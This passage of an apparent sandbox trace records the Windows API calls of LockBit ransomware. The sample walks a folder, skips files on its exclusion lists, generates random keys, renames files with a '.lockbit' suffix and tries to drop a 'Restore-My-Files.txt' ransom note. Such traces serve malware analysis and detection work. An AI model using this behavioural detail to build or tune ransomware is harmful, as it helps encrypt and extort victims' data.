0x753f1e2e [0138.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.900] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.904] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.904] malloc (_Size=0xa6) returned 0x77d7a8 [0138.904] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.905] free (_Block=0x77d7a8) [0138.905] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.905] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.905] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.905] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1864, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105414.WMF", cAlternateFileName="")) returned 1 [0138.905] lstrcmpiW (lpString1=".", lpString2="J0105414.WMF") returned -1 [0138.905] lstrcmpiW (lpString1="..", lpString2="J0105414.WMF") returned -1 [0138.905] PathFindExtensionW (pszPath="J0105414.WMF") returned=".WMF" [0138.905] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.905] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.905] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.905] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.905] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.905] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.906] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.906] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.907] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105414.WMF") returned 1 [0138.907] lstrcmpiW (lpString1="ntldr", lpString2="J0105414.WMF") returned 1 [0138.907] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105414.WMF") returned 1 [0138.907] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105414.WMF") returned -1 [0138.907] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105414.WMF") returned -1 [0138.907] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105414.WMF") returned 1 [0138.907] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105414.WMF") returned -1 [0138.908] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.908] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF") returned=".WMF" [0138.908] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.908] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.908] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.909] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.909] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.909] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.909] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.909] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.909] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.lockbit") returned 72 [0138.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.909] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.909] malloc (_Size=0x40068) returned 0x3d70450 [0138.910] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6244) returned 1 [0138.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.911] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.915] malloc (_Size=0xa6) returned 0x77d7a8 [0138.915] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.915] free (_Block=0x77d7a8) [0138.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.916] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.916] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4928, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105490.WMF", cAlternateFileName="")) returned 1 [0138.916] lstrcmpiW (lpString1=".", lpString2="J0105490.WMF") returned -1 [0138.916] lstrcmpiW (lpString1="..", lpString2="J0105490.WMF") returned -1 [0138.916] PathFindExtensionW (pszPath="J0105490.WMF") returned=".WMF" [0138.916] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.916] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.917] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.917] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105490.WMF") returned 1 [0138.918] lstrcmpiW (lpString1="ntldr", lpString2="J0105490.WMF") returned 1 [0138.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105490.WMF") returned 1 [0138.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105490.WMF") returned -1 [0138.918] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105490.WMF") returned -1 [0138.918] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105490.WMF") returned 1 [0138.918] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105490.WMF") returned -1 [0138.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned=".WMF" [0138.918] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.918] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.918] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.919] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.919] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.lockbit") returned 72 [0138.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.920] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.920] malloc (_Size=0x40068) returned 0x3df0008 [0138.920] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18728) returned 1 [0138.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.921] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.930] malloc (_Size=0xa6) returned 0x77d7a8 [0138.930] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.947] free (_Block=0x77d7a8) [0138.947] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.947] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.947] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1424, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105496.WMF", cAlternateFileName="")) returned 1 [0138.947] lstrcmpiW (lpString1=".", lpString2="J0105496.WMF") returned -1 [0138.948] lstrcmpiW (lpString1="..", lpString2="J0105496.WMF") returned -1 [0138.948] PathFindExtensionW (pszPath="J0105496.WMF") returned=".WMF" [0138.948] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.948] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.948] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105496.WMF") returned 1 [0138.949] lstrcmpiW (lpString1="ntldr", lpString2="J0105496.WMF") returned 1 [0138.949] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105496.WMF") returned 1 [0138.949] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105496.WMF") returned -1 [0138.949] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105496.WMF") returned -1 [0138.949] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105496.WMF") returned 1 [0138.949] 